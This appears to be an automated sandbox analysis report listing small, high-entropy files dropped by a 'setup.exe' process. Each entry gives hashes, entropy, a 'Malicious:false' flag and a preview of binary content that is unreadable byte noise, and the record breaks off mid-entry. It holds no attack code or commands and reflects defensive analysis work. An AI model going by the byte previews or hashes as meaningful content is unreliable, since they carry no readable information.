              SHA-512:D79BD4B9B6337BD58F13623AEA5DEB1BF087781C7DC7C9B9CE296B0FD7881BEA50B0CC01B9586EDFC6847078FB69612492A0CC1569A8DB5B75784C35AF88106D
              Malicious:false
              Preview:.<?p.[\.n..A;.c..-_.Q.C.Xu.x.X].s./!..n<g......EX.n.S.1..;1.q...;[*...Fo..%\ d..=...Y'..~...).A..I..h-..V..Rpd..X..d.....%.9......Ax.....p..<n.&D;.,s.;7*.]...$.r.._?..\..^......1. .O.7.tp.?....m..u.t..7....$... .".........G..B....Wi.'.*=....QN#......>..f..Sq:.%...~...$K.Oj.Sf.W`...]c.....]X8@e.#3.\.t.....jZ..1.@..C.bKWdHm.......LS.N.Z.r`,.%.;6.....uK...E-....w<F.u...8.....?.b..r..."...l3.9..'.@...r*N...Y. ....:Jg......#.......y..|...YR.C.$..~.jy3Y.}..O+.....PD...D.p.E.d:Zm1.a..:j=.$...Ba.H"...m. ..;....X.'..itH.0....^.R./..$..1.>...7...G..3V......P...l.N.*.z.kG..nS...R..7.8i..W7..0]...,.q'... .kY.........'..y._~%.'..}......"..o...._.Y]......Z...5N.;....&.".1P.(.....XA.Qe......../.D... .=D.."?.1W.?L%Z....Gw8....3Ds..........-=....".h"..1..P.G....U...(O*5....b...m.5.B..$N.;....Xk.X0U?ZH..'.....zeg..L..9>...d .[..L./ .(6n.QM..kJ.X..m.?..Z..P-..(.E2.K.7.x..t..~..q.).cT.A..YA...G.a.........|.J..X&M..Ye......0.{*>....f..I9..;.......>..y
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1753
              Entropy (8bit):7.891070038935643
              Encrypted:false
              SSDEEP:48:PhVZxHcPYH8WB2nubC92lNo2ZF0hGHYvMk+wVXcPlACZEAnD:PL0PYH8WBjbC0NoImMk+eXcPaCZ7
              MD5:C8A615CC6725378F24E808E387335E2C
              SHA1:F73FA2067B253244A3129D359078D4A29E063698
              SHA-256:38C60C5C8A0A339C0D51E99F42C87FFAFD40524E96BF4EBFC2EF5E1AC2ED2C57
              SHA-512:E672E6F835AC25054E26898E0FC6287D7F2E2A958A2C54FE78C68DF0CAA798F21E8BD38E6B253544601DFB013E91CA45D4E6F99E53F4282FC43A94F78A3F83F1
              Malicious:false
              Preview:.<?.%..((.XSx.0...%nR.e.@..._... %......"..BA0.o/...E..6....fV|t#2$.7.....V..).1(..@..~...........G.ryI..._.+.....{.0...o...6-....4...2...<J[7.....`.}..(..K... .(j.N...`~..<..#...3.R.E..x.g'd...<A.c..F.]|..a..r..H...=o.....U.s...F ..Mi'*S........c..q.6..52.;C[[fdh..L"...y.....F+.....(..\...#..|.i...H....._..O..V...wG]!..UVx.c&.^...%..uu...n..!.W.?....G.Bi{..e.H.........u..).k....Zr..S...T..v...tDSg..iY..^a.~.z.D. .:....Y..Y..m\.H....|..>Qm..adZ.V..S./.HqOz9..{.".=n......ajy....(9)-..!...X.a...uP..@....LU....-8.1.Y..j)...3....C....u..v.D.Fs8..........<.......V.}|Y?.B..D.[.O....2.k.s&Y{D..M.`.y>s{.~..'.kh`:.....2..hU`...I.?P..Fm...&...G..,....Q....pV.M......kK.=q.......m...B...O[.#.o..3....,....[.hz.Mmy....e..........@........6.&.si:...D._.#6......I.......J.}...w.."%.. |..U.E..TZ...>..Dq..H.....'.k...bE(9. ......@..E....}v[....1.....Ar.:?...h.....w0..N..^V...V......[......:....v...$.9..}@npUH...B.m.w.. G............LK.....0b..m...6..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1700
              Entropy (8bit):7.878653080227873
              Encrypted:false
              SSDEEP:48:wo1Q385FuW7Tli8cm/Jb2S+AnexoT+4szuBoFD:wq485Fn7Tdb2Sxe+SPqk
              MD5:7117ACEDD0531E9C68C1AD2DDBDF6A44
              SHA1:FB3823C49594B069B42E6D42C6706E08604A755F
              SHA-256:BDF22118647F718223104C861CB82FE86D4FD0928054A4191C22E2D4575512C0
              SHA-512:D03ED896414B38BEC6A9BA5A154C85F83DBE8200E8C89DF6B7E0DA3EFD17A65137A201E3B325559BF0AADDBC2A61224373E17A5D8FC27F333DE54B3E84BDA897
              Malicious:false
              Preview:.<?P&....\.........X..C..C....5...%rN.d.4$..! .....cX!....yL..OWZ..Z....}.b..E..n...i.(...$.v.%.[...#.:..b..kw.#g|...0...D..4HX...U2].....q.f{....RU'..[.Z.b.. .bW...l$.g...,..P..0.".......;.r.J~..L.b..j..3*.lr.}.C..9.#..wC).E.w...F. ...........W..$2.....,....}#........a...1.2^ ..1.'.(./8&..H..bD... .2..9...Z..TC.....E/..6..mD...9e.?..Y.`...\..>..s.WIV...B.e..>.I.B.....E.9`..3E...E~#....l...t...5s_.y.......?...w.Y3....o...!._... {>..v"90....G+i$}B..]...1.y?W`3H..*....0.?..l9... ....E?..z.....o..h..=...d5\..;..../... .1.....K.../...IuD..w.....>,............Lz|.k..w.o....%..+\...v=ifl?...|.q..yr.m}.^&q.U.}.~J.NwO.S.+.cE...".B.$.a.p..!6.#c.^...c5..r,C..RT.)A..=.b.q...?.....[.....,~..K..g...|*...?.!R........wX!1!"...W..{H-..7.i.....n..*..L&>].w.{..k..=Y8z..x.GN@..x.S...2....J.ZA.*.V.....U...j.TU.G.k,.O9]...VY...B..F.....VQ.K...9.......]T.z..S.l-q...pF...28'..9]....2N.....K.X...."V...:.N`.0:....T..sA.'.KA..e..'#..D.Rs..{_..=..>.I...&.5...<b(.|.3
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1737
              Entropy (8bit):7.886842212730697
              Encrypted:false
              SSDEEP:24:M1v6Bw3dVLSBIe0Ssh/SHvDVmj+uVqr6yLWjftCfuwTbjs65YGasi+m7GHubD:M1yBw3WBIeWCQqeyectvJ5zPiUMD
              MD5:CB64DAEED34C735F6C9BECD089E973D1
              SHA1:778556A397A48A5DA45F0C5A7DE809998E00DD1F
              SHA-256:B9083A263F3EC95EB7FFFC24C6E28B2D62E23A1A83D88561306903832B63B662
              SHA-512:E7916901EFCB78ADC1CDBF3E48E2300382834DF91477913AD08285E9B4E4BF3EE2051FF3568A3C01AF679A2B0D63C361EE1F10BEEB8F2367E42F7869D42C09FE
              Malicious:false
              Preview:.<?..;.y.4vL ...........i....L.8....;...............:.!..^"..[..R$..q..h..W.f.M...8l}C+..!.[#.3..|c..I.`..]u8.H.Dv..Y....w....RV..v...h..7.t.M.J..qq...s...[u.>2.P...K%iLg.....WK..z..%.L.&.2].8..0....u.j....4..y.......# ....._..z:....G...LZCi+p>vN.J.n.Y.._....%....T.N+o...`....p{........6v.~sbB..-...#_$.d.G...B.xfEe.&u."...$....G+s@..oM..%G.v.z}....)...~...r.........[B...UfY^......7|...T<..S/.]P....L2.$......z..d4.Z)..~p(c.)+|.$*...qR.y.a.=".E3D.*GF.ATo..xbt.|.OL.NG..:jV9=0.V1...b...`..T..}..nv...5.*.^("..L..N........b..].....gQh._+S.O..:wypksF..l..E*}.......\[0.$...O.........b....~X1..K...U:KV.*Ca.N.#7..@...h)1B.B....`t...&,.trH.....0...P..g.N..L..R......sj..W:..{...8.......:.....N.B...@.aW`....kN!...&/.'.Z%Z..|......66y.o;6.Ad..U......95..q...j`.l......|...D.3..D.>.?.......I....Zw#.jK.Y....~.[........>...h............c.kd.6..^.....M_...e@..!G........".[..%W...-.y.LG...e._...qo..v_....;(.....U...b...m.7..[.$.....}v.>.}x.&..V..q.j.xk'
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1722
              Entropy (8bit):7.885704657121522
              Encrypted:false
              SSDEEP:48:lAVUqzNsJtKrdf5kNvPCx1eNrcyfkHvAp36qOiiZD:yUqzNWcvWI+Iyfk8Kq4R
              MD5:FFDBAD1840488A995A9BE5BAF8CE1DEB
              SHA1:8B296AA9A392EF0BA3DBB7216FAEC7782F036C2F
              SHA-256:1894608F67401E484399168A7316BD0D56566462602AD97FE3B4F99CB7A28C3D
              SHA-512:D255685D30AC6A7340474C039F9F6984B4A532E646E8CD67E2B445DAB561A2EAF7BC6BFCB08A82DD1D6BD1BE4662D1B2842CCF3AA8C05F2E76A1A7D5FA6D4ADA
              Malicious:false
              Preview:.<?......;d.>7.....w.1c...Xc..}.....c.F.S7......)E...^.s..g...........a..c.c....S.%.3,m....0.O.|.Je|.. .o5..5@...v.5..ux=......<.J~.nl.F.`.y......O..U.h.i..O..8#..].C?.r.8&..M..8}D+...]..P..T..../...r..Abt]..\2c..v....o.._......4z1.,v4..A..Q<....N.ie..Ve..`..*.8..*... ].~#.....F!.$@...0.......Cl.h..7R,.V:L..../.A..d....v....kx..D...l........#l.J.[.o...)..@.=..Q.J..=ug.B...R.k.h.-.z....p...Q.+....O.)E...n+.Z.q.....'......E$...3.b.N...C..}.v._`.c.;.<..$%............3.Rn.hxQE,....;7..{..9...%.qU..k...w2.xP.(K...;....s'._.>.B...~.UR......U.a.. ..zB.B....b.u;..*{.l....WW0....Z.-yin......{....1X'.9Ug6Gbi..6.e.y,U.....!...1.55..R...z}.!/.n....A..Z5|...B.).}*...c...zOm.XG..~..l..3!...o..+ci8..=...-.2..(.dzn..".i=..m.^"P.&..5.. .........U..0u......>.d[.HiR].....tF...G....^v>h...{Y#.#../._xTj......d.I.2..iETW."$F)......iQ,@+a...(.Scz.!.NxO.x_....e...a'....J61...<..j.........l,qZ_..>..g.k...P.M.....X.4.....e.5x...B..-..i..<l1..."..$x.......+ .A........%e
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1759
              Entropy (8bit):7.881580535348923
              Encrypted:false
              SSDEEP:24:cHJSOcBoh3HvrTi15cBkXW6NzudVZSXoZF257f4ENW262KmxW3iezilqCLDPh1z3:Eni1aBEuJS207WAx6BzHCLV1NHDE7leD
              MD5:E4A45247E7F15D4DF5A91AC34139ED24
              SHA1:ED3E7101B6FFD2F3F2EEDB7D7069D25A86FD5EA9
              SHA-256:7EFAACFDA90C5E3E98211DC4EFCC5EDEFEE1A1DC8CA87A0F5021A5AEFB334426
              SHA-512:C89382456DBB28757659572C1690639E6603C205D3377B55150CD9DFA20B43F800C1D0A21918AF8F4B9C45A545E5330207114102106A039D5C7E23188F3A9AE1
              Malicious:false
              Preview:.<?.......4'.7...x?R.....2.......h...b...]g.......g.....D.tk.q.7..e.Q-....y.f:2..a..@u(X."..m.....Y..a.fI..QJw..{.Wy"l.pK...\......+....Hc.[H...X._.5.PQ.l..P"f..h..%8_.Q...S.%lR.b....~....&..y.....W..-Sv....Z...g...5...Q...X9.&.~P.....sV.[u?{..?.g..f........$...Th...zwZ.m._.*.R.2.VX...j..T@Am.~.M5SQ..W.Q.9..n#?!I.....F...,..j.'?.`(x....{A.?.C.g....*........R92....Q..!..28Pr.....o...sc..n#P>L>.r...........(...E..-...t..~........c8c.......CC..1..e,..MH.....b.....|&.G...!o.] #.u.j..-..:....9q!......<.@0V...VY...<.0N...F..x&.z..0.de.{,....w.....v.]...8...3..V.O..W......I...aD..F.&FTT {C..U..r.....#..........`:.R...FQp.ux.z!T.|...lB..../..I.i..(|.....X:fm.0.5.......V.3...........d.7.D-....^.=6.z..0[.T...Cu...K....K...C2R{....5..........@)!....;K..........xn...b.iL.Y.@.$?.B...Lf).%`=....:.M..1_...rGM........?..Q.....{:w=..g..L...8.Q7.(......7..4^...L...A.@..!55.h....D...Q;....E.*. ..s...Q ..%..8.[ #..\....N2:.U..{y=.IW/........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1706
              Entropy (8bit):7.903811337262563
              Encrypted:false
              SSDEEP:48:GQnmVEe1j6fzz06N8atUzODDeHTKK6ud4RD:DmExfzzrNZtAOXvKy
              MD5:251B1B1678DEBBCE1246AD55E8A60F26
              SHA1:7C6C56174F089A9C5A0124DABEDB4028860865E2
              SHA-256:6DB112F3FB5D7039B79FF2072C0CBDA349D95C75633CAB201D35A8789175993E
              SHA-512:05A91FF5713F8F389DEECA193B32542AE9C60FE6CD7009BBAAB746DAA001F3CA6CA31AA7C930A6C346491555E7C004EE1F5D5B41F7D2BDB4CF712CD58AE2DFC6
              Malicious:false
              Preview:.<?......;.d.Ks..}...'..@.......2&.....p.~#.=...Vd.{.`.....=.^1.......zm....i.<...=.1..9.S.f.c./.}oM.......#.h.....Z.L3.A.i..,..R.h........yY.....gP..'.......Y.q<9........IH:{.0.$...|....QV.@*n...!Iem.O.r).3.........n..V..OI0sC,..W..A....:....:...#..s.I(n..M..u..$...*a.fC........]19x_.{L.u.=..>F.....g.+./..."..n5.4.W%T.%v1./.'kS..=W..Oy..D.@E..`.".Q.Z..!.k..../...4>...i.A.1.....o.|...q.xu...z..pu.@......../r...;..}2h2...tR]U..c:a......M.G.....6.(..e..].Y...?)........R...i..(+..?.T.$...r..n..)..O.....!0.r/.R...].>N...u.6.7S;.:fG.O..Z...........D....n"Q.E.V..L..."E...l.m:...SH.U~s.-.[k..T..."....`{Hl. .#.V..+P,...d.~.;..x#.....=..1m.....K.. .j.}..t.E.n..v.V.i....u.....N.e.S..Qq.('N...=.....Y?w.bI..d.H..&.\...?....\..Xg2.7.}8:.K&...,7d eT.k.t.s...Mp...S....v.b.X.J(DVY......u..%V.r.&...|$......f..c....X.e...Y..T,".o....8l..um.P.......\.k<+..z....`...@..8.=.@^.8]d...i..f....+M!#.k;.9...A..u.......).A_.<..(.B....CM..j...G&.x....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1743
              Entropy (8bit):7.877714474688391
              Encrypted:false
              SSDEEP:48:DGmpRzcQcin8r6wLXh+y+o0pxOk/vir1SGurUVwxnghD:DG4pb+ExOkisawKJ
              MD5:24AC35072320708F2D4A78FB963FF457
              SHA1:CC20D8EE183D06B99A0B4104B3717429015FBB6A
              SHA-256:82E0684649D98CDE1D901BD5E3D3A58414259304BE646D2479C96636FD3BAEA8
              SHA-512:15E3BBCB6CE9B72513E9010E9877E892CC27BFE2E1FAB513502FC23864081F5E12385E31E345528C418F82A2EBEC4A9A142CCC62BCC8FC1AF4AF86F6D1C01F82
              Malicious:false
              Preview:.<?g.M4J.D.CE.G.LK..d;E[.K.....z.b.\.v....>|t}..#\.U......(.).[......._.t.'.0`JK3:..<.A&.c..L=...;)@..;O../.c.....4?....U.. \....O.b..u.].k'.t..x....c..v...pvU.>..(rmnp..*P+...1.......]....(.:.h]w.tD..g.....N....'....%.C..{=..:.`.....]....q"..h.N.@.T..4ucY.^.9g_fs-#d..C./.;.2.u..X...{5o....WtI...u.3..Aw.\.......uE.....W.....+.n..Y...s...S.r.......~.A.'...b..}.Co.^..V=+E...@R..J.....3...as..m....M".q.@0K^..WUJN..{F.6RL.B^.....X,OJa......^....s\Q.,..Euz...V>...:..c..{...2...u...Y;._d.G..1b..:.O5.Mc ..A-..N...(.....:c-.d....d"2.##7.*p....K..........]..%P.}Um.Hy3.l~.*.Yr....1K....D.d......5$[.h.xp..@X....Z....%..5..\........l. 7.....8.U...1.?#Q..z..d..k...l..*...%B.++rs....@.NaH.+...[.D..s.s.sZ..........Y.a9.U^....../...w.U..........3OK....&[..w.....y&VB....$o....b...:......I.n..Q#O.V...0.....W.68...Hn4......h!..A..p..Y...^......X.........a.@IGT:.-.^......d.....j...A"..*)..2.~...a).h..p..b...7.KgT...P..Tg.~...,,9..?p.N..$w..n)0..S#P.I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1696
              Entropy (8bit):7.873888605382204
              Encrypted:false
              SSDEEP:48:53iG8xC+C3XFUl2K5DO5c8X/Q9d6USD5V7zD:TVpKulP6q
              MD5:57938661D686CE443D2024E55189B73F
              SHA1:85EFD26B482B5AB5A350D1EE0C3B6AC06F487164
              SHA-256:58AB739D81E272FC6CADF5358324BD9DF7310BC155494B8FB1BF4B2A385EEE36
              SHA-512:C4402C140C64CEC000E9FEE376381DE16F5CFB961E1BF40E75CE21C645B2F9F265A6D921CC301554D3F4CD44D518B59505FEFE4E09760FB521595BD0503952B3
              Malicious:false
              Preview:.<?r.}w..4.uD.C..T......<.......$..d.s.......s.@o.fx......c.y.h`..wAN.|W..I.z^...`..yf..-z..`....7b.C8...=,7..'5Y.......l.........h....:h...j.7.4.....@6.snU-V..O..m.....N\Ey..4..8B;UuC&S.o..g....EE......%'$R.Wu...o....F..7..Na...z....=.!...4JD.6e+L..3.OF....Kx.."i..k..*.....Q-..&7#.^ %...1\@..o..m...N....&..'..U..|..m.us.a..$...e.f3......Y.I.z..g".H.7.Sd^.R(v.:C...Y..+.....Q.[.B..P..G....y.M9>..4.jN...u.2..%.t{...xl........q.=@.J.D..|.2[g+X.v..Y........@.....OM.s....bV...,2.Q.I.,...e.,.r.H.."j!."8....L.......S.....^..H'...m{;.p...k..c..I!`$%dU..&%...j....D.x....%c....E0.8...S.-.~Y......S......JR.p(..+1...v...S..`4.eS..<..'+..Y.. m..d..!k./..P...."tAju.......}.N.zz..>.5.z.H1.5%.F..V6...39...L..3.[...J.Q.3.p?.'..R....7..u......}rd.T..h.8Cy.)...t.WZW.....X{....'f......1..6.6..!6C.DH..8.s...a'!...7.R.....u3.4.+#......8.r..4Z..Lqz.\...2q...8..%?..S0..9.h"8"}%...w.h...k...w.z....C`\.G..lL.K..A...[....a....Y..X..0.f.!$..wA......D/...t.!.."h.Q3.^}.?.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1733
              Entropy (8bit):7.886048361263212
              Encrypted:false
              SSDEEP:48:YHAVc/W93g1tsMyZBpAPWxOloVfzmPpeD:Yge/PYzM8iRm
              MD5:CD058981BF72EA177986FEC78046E2EB
              SHA1:31EF5388D1C39E65EE75AE9E61B18D0E485D345F
              SHA-256:4399D2392BF05EA250B787C3F88BC899DD6B8A6EB46C6584AF109C53CFFC137E
              SHA-512:0BE68FD824C3B0FCC9D2816701D7EAD163457C2B136380595271B37F202AEA12816DFA138C0F462D59526DF459CE5A0BAC1DFE922817FC04359CF5E7EA7388C0
              Malicious:false
              Preview:.<?,..=.!.r..IU.5.._E.5P.....Uq.e?.>7G;..@A......4...>wIU....uS..k*.......:[4(.24k.d..[&.9..$.F.?.(...+.....Z..Z..*.FU.6....:.l.....lG{...."..v2..y.;......."..g....4F9.......>..F...:>.s.....<z.6.GfS.T....r7.n&*<....2..........P...@z.g0.{...."O^...|.........@....*{LjX..n.cQ[...NW.n'G.......Iv.aF9}..s..K_j..G..*.*.{.'.2.:.f+.:...K...`..p...;L.Yz..n.....M..I.P...~.....H..3...Zu.:..J7......d.w.G.<l.Dr..H.-.E..."W:........Y.....H.Jw$+u<5L..x. o(..W.!L.b$...g.?..I...$...............l..........!..!']...3`.Q#.n.I...h.,p..2..v,Y/...P%/.n.....9....K...A....j-...._.G..."....>.t.dS...H..Wp.=..5.9I..%.9`9.....I.y.-4...Nd......C1.Y.....k....l9.14.....$...yH.m.....;_............&..N.U1..Y..Nt.5.{...I.-..m.g.eK.<gQ..0.......I........cy{.]..MP.A..4y."Y.C..S...z.....F...]j....7.rB`-...p.p........z......Uw..K.>........]Rf....L..o*.|B....]K.....J1..........[FDS.'C+..K.6..w.x....}...;..g)L.H).!.,.......X0....^M|v.s..1.......GHe.4...t....D...k...=s|o
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1706
              Entropy (8bit):7.885554484387911
              Encrypted:false
              SSDEEP:24:rqWHwafO4bilAHQUrhnJLMHK7DcQSP4/gKLnoKYrQyKd+ybhbD:rqwwafglANlnZZHcQZAejbxD
              MD5:102A73B999559CBBF19D5E7AA195A89B
              SHA1:303704E2E0B18D9B3CC816E852B24955AF324B67
              SHA-256:F9ADDF2CBAB842089E3894AAA7CD4001C10E37ADDB3CA4B0F60D7B9D38CD4749
              SHA-512:8BD060DB27E783A5618722D5B806712BF4DE1C4A8E357E0ED563E7DEE967C8F82D12595B7D24DEBB6DE8BEBAC6E78BEC8AA6A54BD7487A2D3B7E37DF50FC161C
              Malicious:false
              Preview:.<?+..y-....7x..(.\Y.....{.,..v.Y]'...P._.[.Z.C...:..f...t../S......2...fx.R.k.F .;..$....C....0.._.......*C...(.}a...........d....*<.KcW.8B.]Q...^.".i.A..T.L..M!../.. .....yRc....?.?\..R..s:.....%.T....".[.^.S.Z..T\\...nZ.9..N...bH.@...o.*%DH...w.!.FW.=..`6..8.m....vz....I|.Q&.. .....t...~-....=..yr4....V.q..vD8.U<.j:ua...{.2Z..1..:...........8<5j.j....k^.6c.".U..iS...............8..c.........).....G.......r..@.(.i2...L.c..B...n..d.y.7.A..-....G...x....v..H...Z...k......!D..( ..EK..[/e.x).....5...iz3;...]s...Vo:_..D..4.....K.?*....7.(.@...%t".V.i.~..C.I.C%V4bX.........."....X...&.:-G...^.W.D}"5+...../......Ae.Y.o.& R.v...^...{.......i. .[c.h~..U*....@.....i......?Nz.....w.Tp....=....vFs.....U..&.Vz.Ua!..|'#..."y-.IH.c..'..48r`N.r..aN)<..._.W.l),Bi.H....0...oO.p.5....~.....qy...X.g.f.:C.'d...V.BTd?.<..}a.K.C.RX.p.....g|..(.+~.;.!...y.D....m.kV.5... }O.t->!S.3..4A.M..9U.y{........f...#........lQb...W..Y..u..d~.f..4c.Q......P7).{.n...f
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1743
              Entropy (8bit):7.896087197883859
              Encrypted:false
              SSDEEP:48:SHivqNVMEM9aHC/InaAQCdTQOAuWaA5QZ0u8uhPFBSLlD:+ivqbM9KCNAQQFSaA5QCu82SLd
              MD5:542518DD7726626095C176E33C8FBC83
              SHA1:24A01BE1FC62E51F43428CC51FD4820F4DD309AA
              SHA-256:04E2F1E4731639B5FDB79248DC5CB06ECFB35E9D9D7A3B9B60A2A32A5392DC4D
              SHA-512:440B04A4A2DBBF74DD3CE43140664F7C910CD4CEE2EE3EC350B248F481F59528AFEDA46C2A72EF3A02DE36CA550E6B67FF1DD695AD3BEF570D891CE708C289D2
              Malicious:false
              Preview:.<?.KF.w#. TcFkT.o..9p.J8.3TI[..._.q.p...@..}..5.1X.f........K.g).Sj.........c9......ba.m.]...1/.....&X......_..Rt.....b..t.@.G5n.Vtw....\...../......3w....]..D.6|r{.PH.g..o.:...g...*0..e...^OEl/....c.......l.X......O.r.....%..c....3.....W..B.@U..xJ.t...7..8.Nt...Z..5_...W.n.V..\*..=.L..J.f.MZ.&E..*.D.x..8_.f..yw...!M:_... .[zn.1.......&.|P...+[..j3.X.G...D..c..J.....j'7.`.P...P0n.<.;.A@.7....A....Y._..sOr.">..BM..#.!A...K..6Rb....G~.....a{.g....h..T..4......['.........o].,..~. .....6.!..%~.5......:.Y.H...}.g}..A.9...'i..3.Z...`j./-.....qj.$fe.K.t'.].....+..<...H...X)D0eJ.!...7...Lip.....rx...@._..-"..@.....S...T....:...$$.0o...r....H.....=....u.wD.@...='q..b.R^NMc.o.34..u.!..4./.,^h(KY...F.s3.U.o.6....N$mr...,m..V.9..A.+.F...x.7c..Z0..|. p...=s..Jg.b..k%.wDwt.x..7F.r...Wi ..wI...m...c.U..T..";......-...LB...v.....m*7....g..H.~.....]2=ftp.~..0.k......,..X......<.}.....C.)..........Z-.Z......+.....l{..l....M.N~.......d.4.>.n....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1692
              Entropy (8bit):7.881111218633741
              Encrypted:false
              SSDEEP:48:PPjPcS57O8DeZivmqwUEpnhqbccMTzrVCoHauqmRATfD:zUMeZo0UChqCTnAyauvATL
              MD5:2EF6EBF4E3EFC84CF39E9A27D9684FB2
              SHA1:C52581E6F71934BC0496B2F30ECD02F37F07323E
              SHA-256:62EF58B957E1E267473ADC8E3A7636FDBB1506465656885CCA086555CAB96894
              SHA-512:FC2C347562E240E2431E992AA292390B23F747B537CC57572B2DDFEB7338CBD49110EFA12D10809104E20AB09B3E0BFA498FA5D71C60EE2C542D03E5D7D22493
              Malicious:false
              Preview:.<?+..c...pL.w.*.(....U;..xmk..4.N...4.......x=..2...v.$.....<.....S!Kd5u..=._K.-"..@r...`...TU..A ..u}n.f..G....,-...?k]...UNn... )....y.$b.....t.a..c^-..U@.1.ip.ri.].K.z2.....!zxL1U...+.....rX...E.;.6[O.s..Z...v.........l...5...Z..W...=..g...)w..$4.....qX...H.x........&.F...y\....f2.._._..3...p0rY.....R.\...Z.r....'..^.U..=...K.]..k....k.f..^6....g8..&C.L...pi..FY..s..<.zBY..?.....PC......Z9Y..p.J....$.,......FPQ..r......Pt9....%.....Z.'0G}..Z....h....i[.....;nT.a.f...,.../n..... .L..-....M..N1.o.6k.t...9..W)...:Li..+...Y.......*....=\.......J..?..;.+#.....Y.S.h.....B.c.>,..P...#S..9......:a.U.F..<............W?...8._9........l.S....\...-.....m\..R(...=.......h....!K].-.CB|~....J>b..k,UX..d.!>..$O.z|...H......@~.G...15L...7..{.........i.o..;TF...i.w.vL...s..3.@....V.Ko..A.~yLx...t7....:)L...).j4.(&...q".w&.k......z].WQ...lf<.JQ.L...I... .%...)...U.VHj...@.v.+.."{.o...O.....l...d.p.<.N......L.&$r....E..:....D...]Z20.G..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1729
              Entropy (8bit):7.885733913586227
              Encrypted:false
              SSDEEP:48:WzdrMyssNBpBItcJkzNRP5bWz6DgRHbKqzmtNuJl3ED:ip0Uu0y5bWz6DgYqz6U3Q
              MD5:52A1FB20783FA8BDA7061D11643AEE4D
              SHA1:F21C2AB68ED4C3EB2E8B61CD5B32BB0D3268ED87
              SHA-256:6933F1D494C004BEA9AED1904832132EED2E4F41B8C6803ED4047624D19ECD40
              SHA-512:780D4158A258E3C1FE49FD14078B2F6D2EAE86CF62002E7C450BBEEF9EEF4C5A46A03A56A6565118CEA292000BE36C316BE3026313D7B39F2A045363F88B3E23
              Malicious:false
              Preview:.<?...u....?I.7. .WWs'..V.|.U.NH.%4.J..g...$J..&....=x..'.g..W...`s....2.]O@..E!"u...{...,..-}f.....e..<...e..?+D.|..... .#.x...1V.u....7l....r.!;+..,....N...P.j.v..g..y.HrJ.."U~qn.*..v.U....5r..me;5""/..v..z..Zn+$c4..w..%.J#.....F.........~...[...k8...j..6.l...r.$.7...42s.......h. .......l?...~..TY...2:`B......k..V...u6.:......^c...#....u.:.^..5m..L..U... ..-...M...H..G....>.}v|[h.4....)..|...@B.6.{....9....f..?Qq.c.q.p0..9% Inb.<G. ......(...@..a........c.L%..a..... //..[>#?.PX...:.s.4!..j...va.......p..6.`.u.n<....]...H.f.........K....u....1..K..}^G..s"..{.)y.g|...Cy:.6...&..<_...1.K..h..3h.q. .U..{.Lj.J.....1....%|...'..~6..B.RH.N..]>.E.&+SS.i..W.';6.:.h:..!..T%.\......Gn.....PF.....06.}..'|v...{...3.oG..9...O.N.{.4.np...:~..tfNI....#E.n....u.^.4.%...G.9.nPq..K...vv..&..m.....h...+.........E..."a.c....i"..^.......F...\cqor........j.)Y....b..{.}.n..`.lj........b.k....C.b...5..Y...P.@-AR..r..]...E.........k.b.....sB..\..l.j...q.Pe.?:
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1694
              Entropy (8bit):7.8896241655000905
              Encrypted:false
              SSDEEP:48:jk3TZPCaefzhxMza3ohL2FXM/lchM7/jD:jTaerhdKL2FhM7n
              MD5:01370303AFD52117F788CEDB390F94C2
              SHA1:D7BC899B6C637069B4761031A5B5ADB1EE6434A5
              SHA-256:978A7CF1A45671B0BF5734F1A1A50196204A1B162F61E131CEF6F2FA4FA28FA5
              SHA-512:91E6E91A7D02084BBCA99C3751AF7A23A9AAE5841364499AD1095493536301F771AD2FE6093A27AD2AF21D24D3D4F93500EB124444F77E780024C0CCE210DDBB
              Malicious:false
              Preview:.<?Ye...n.BV..az..<.K.G..{...:#r>`.U....<YLO.._."YxR.OPAJQUf......y..$....../d^E..J..=.....<.....&'A..T..0..l.C.c..W0"...z]_9.1F....$N .z...3.K...L...n...r:............/8i..ZsII.5.o"a.aU....8..]...a.b....'e..6.t...e$..K.c$).....-.p..T.6...<a......D$....3.mK.bF.7x...&9.)M....U.>n\........Kr.r."_].S.C".4..Q.g=.;\.y.....On..7x.S}(....~...3MI\..h..}7.(.6y.EA..<?..0..lA./.u|..#.....}.(.qA.=..%....j....'U......R.._.t"...a..".v`E.\[...w>..(].y....N.h..R...h"..9.b...>......tx...Ggw.sO..vr..pl.../1....u..0..J.\%..*..p4r.+..>.=.E.O...#...!<]3J..~A..Wj.BJ2..~.I..M..<B.F......+.NQ...g\....5 h.X.`.C..k.......%^2!.*'..qg..iD}.B...".J(......5.8r$ ..HQ. ...|.....7CX%.=.sh.... l...Y.).....T..{...k.5V.l...3.].^>..)ep....H..sR.k.&.8......t#.~...|.*@...K..L..I.H...u.Y..a.:..hlp.H.&(..za..6..8..k.....A.I.n..O.N..}..R...Szy..s.@...L-.N..f..f..d....yS...|y..7.vkC=..D.#y.&/...KQ.-"-...~.....SG..}6..~.8.V.\w..R.D....p4.....;?.H..P.......W..aQ...T..=.f.WR...y
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1731
              Entropy (8bit):7.8817491041340535
              Encrypted:false
              SSDEEP:48:ogxOPAGK1ZBFB2ZjpHSfAdaYsdIVXkE6g/WBOt77j4D:cPXKjXBOpHvd/sCV0E6vOt77w
              MD5:479DC26F65DB051CD16BDA1B23543637
              SHA1:9B0EACAD5C5B24B641E754F116FB02916CDB6978
